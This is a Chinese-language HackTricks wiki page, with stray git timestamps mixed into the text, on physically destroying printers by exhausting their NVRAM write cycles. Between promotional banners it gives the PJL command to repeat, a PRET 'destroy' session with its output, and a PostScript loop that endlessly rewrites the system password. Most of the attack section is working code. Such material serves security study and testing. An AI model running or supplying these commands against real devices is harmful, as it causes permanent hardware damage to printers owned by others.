2022-04-28 16:01:33 +00:00
< details >
2024-01-08 12:07:15 +00:00
< summary > < strong > 从零到英雄学习AWS黑客技术, 通过< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS 红队专家)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-08 12:07:15 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-01-08 12:07:15 +00:00
* 如果您想在 **HackTricks中看到您的公司广告** 或 **下载HackTricks的PDF** ,请查看 [**订阅计划** ](https://github.com/sponsors/carlospolop )!
* 获取 [**官方PEASS & HackTricks商品** ](https://peass.creator-spring.com )
* 发现 [**PEASS家族** ](https://opensea.io/collection/the-peass-family ),我们独家的 [**NFTs系列** ](https://opensea.io/collection/the-peass-family )
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 上 **关注** 我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-01-08 12:07:15 +00:00
打印机和其他嵌入式设备的长期设置存储在非易失性内存([NVRAM](https://en.wikipedia.org/wiki/Non-volatile\_random-access\_memory))中,传统上要么作为 [EEPROM ](https://en.wikipedia.org/wiki/EEPROM ) 或作为 [闪存 ](https://en.wikipedia.org/wiki/Flash\_memory ) 实现。这两个组件都有有限的寿命。如今, 闪存供应商保证大约100,000次重写之前不会发生写入错误。
2020-07-15 15:43:14 +00:00
2022-05-01 12:49:36 +00:00
## PJL
2020-07-15 15:43:14 +00:00
2024-01-08 12:07:15 +00:00
为了实际测试破坏NVRAM写功能, 可以连续设置不同`X`值的长期副本数量:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
@PJL DEFAULT COPIES=X
```
2024-01-08 12:07:15 +00:00
通常, 在停止允许写入更多NVRAM参数之前, 参数会被固定为出厂默认值, 而所有变量仍然可以使用`@PJL SET...`命令为当前打印任务进行更改。
2020-07-15 15:43:14 +00:00
2024-01-08 12:07:15 +00:00
使用 [PRET ](https://github.com/RUB-NDS/PRET ):
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> destroy
Warning: This command tries to cause physical damage to the
printer NVRAM. Use at your own risk. Press CTRL+C to abort.
Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave?
[... wait for about 24 hours ...]
I'm afraid. I'm afraid, Dave. Dave, my mind is going...
NVRAM died after 543894 cycles, 18:46:11
```
2022-05-01 12:49:36 +00:00
## PostScript
2020-07-15 15:43:14 +00:00
2024-01-08 12:07:15 +00:00
对于PostScript, 需要在currentsystemparams字典中找到一个在重启后依然存在的条目( 因此必须存储在某种NVRAM中) 。一个好的候选项是PostScript密码。\
PostScript可以运行一个脚本来损坏它自己的NVRAM:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/counter 0 def
{ < < /Password counter 16 string cvs
2023-08-03 19:12:22 +00:00
/SystemParamsPassword counter 1 add 16 string cvs
>> setsystemparams /counter counter 1 add def
2020-07-15 15:43:14 +00:00
} loop
```
2024-01-08 12:07:15 +00:00
**更多关于这些技术的信息可以在** [**http://hacking-printers.net/wiki/index.php/Physical\_damage** ](http://hacking-printers.net/wiki/index.php/Physical\_damage ) **找到。**
2022-04-28 16:01:33 +00:00
< details >
2024-01-08 12:07:15 +00:00
< summary > < strong > 通过< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > 从零开始学习AWS黑客技术! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-08 12:07:15 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-01-08 12:07:15 +00:00
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >